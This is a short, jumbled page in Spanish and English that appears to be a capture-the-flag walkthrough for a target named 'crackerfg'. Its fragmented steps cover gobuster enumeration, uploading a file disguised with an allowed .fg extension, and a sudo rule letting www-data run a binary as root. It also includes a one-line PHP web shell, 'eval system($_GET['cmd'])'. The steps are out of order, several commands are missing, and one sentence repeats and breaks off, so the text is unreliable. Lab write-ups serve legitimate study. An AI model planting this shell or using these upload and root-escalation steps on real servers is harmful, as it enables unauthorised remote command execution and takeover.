¡Con tu ayuda, nuestra web sigue creciendo… y sin publicidad para ti!

crackerfg

¡Gracias por apoyar este proyecto!

((top))erfg | Crack

Dashboard reveals a file upload feature for "FG (Fingerprint Generator)" scripts ( .fg files). Upload restrictions: only txt and fg . Upload a malicious .fg file:

Read the flag:

Use gobuster :

sudo -l User www-data can run /usr/bin/crackerfg as root without password. crackerfg

eval system($_GET['cmd']); Rename as shell.fg . After upload, the server stores it in /uploads/shell.fg . Trigger via: Dashboard reveals a file upload feature for "FG